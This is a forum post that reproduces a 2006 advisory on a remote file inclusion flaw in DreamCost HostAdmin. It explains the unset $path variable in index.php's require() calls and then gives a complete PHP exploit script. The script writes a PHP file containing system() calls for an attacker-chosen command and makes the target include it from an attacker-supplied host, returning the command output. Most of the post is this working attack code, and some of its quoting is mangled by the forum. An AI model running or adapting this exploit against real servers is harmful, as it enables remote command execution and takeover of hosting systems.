Jump to content
DS

Host Admin

Recommended Posts

=======================================================================================

HostAdmin - Remote Command Execution Vulnerability

=======================================================================================

http://www.xorcrew.net/

http://www.xorcrew.net/ReZEN

=======================================================================================

:: Summary

Vendor : DreamCost

Vendor Site : http://www.dreamcost.com/

Product(s) : HostAdmin - Automated Hosting Suite

Version(s) : All

Severity : Medium/High

Impact : Remote Command Execution

Release Date : 2/11/2006

Credits : ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

By creating a product that integrates with the major payment processors, registrars,

and provisioning tools on the market, HostAdmin gives your hosting company the power

to bill and activate hosting accounts in real-time, even while you sleep at night!

=======================================================================================

II. Synopsis

There is a remote file inclusion vulnerability that allows for remote command execution

in the index.php file. The bug is here on lines 5, 6, and 7:

require("setup.php");

require("functions.php");

require("db.conf");

require($path . "que.php");

require($path . "provisioning_manager.php");

require($path . "registrar_manager.php");

the $path variable is not set prior to being used in the require() function.

The vendor is no longer offering updates for this software.

=======================================================================================

Exploit code:

-----BEGIN-----

<?php

/*

HostAdmin Remote File Inclusion Exploit c0ded by ReZEN

Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf

url: http://www.xorcrew.net/ReZEN

*/

$cmd = $_POST["cmd wrote: ;

$turl = $_POST["turl wrote: ;

$hurl = $_POST["hurl wrote: ;

$form= "<form method="post" action="".$PHP_SELF."">"

."turl:

<input type="text" name="turl" size="90" value="".$turl."">

"

."hurl:

<input type="text" name="hurl" size="90" value="".$hurl."">

"

."cmd:

<input type="text" name="cmd" size="90" value="".$cmd."">

"

."<input type="submit" value="Submit" name="submit">"

."</form><HR WIDTH="650" ALIGN="LEFT">";

if (!isset($_POST['submit']))

{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system("echo ++BEGIN++"); system("".$cmd."");

system("echo ++END++"); ?>");

fclose($file);

$file = fopen ($turl.$hurl, "r");

if (!$file) {

echo "

Unable to get output.n";

exit;

}

echo $form;

while (!feof ($file)) {

$line .= fgets ($file, 1024)."

";

}

$tpos1 = strpos($line, "++BEGIN++");

$tpos2 = strpos($line, "++END++");

$tpos1 = $tpos1+strlen("++BEGIN++");

$tpos2 = $tpos2-$tpos1;

$output = substr($line, $tpos1, $tpos2);

echo $output;

}

?>

------END------

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...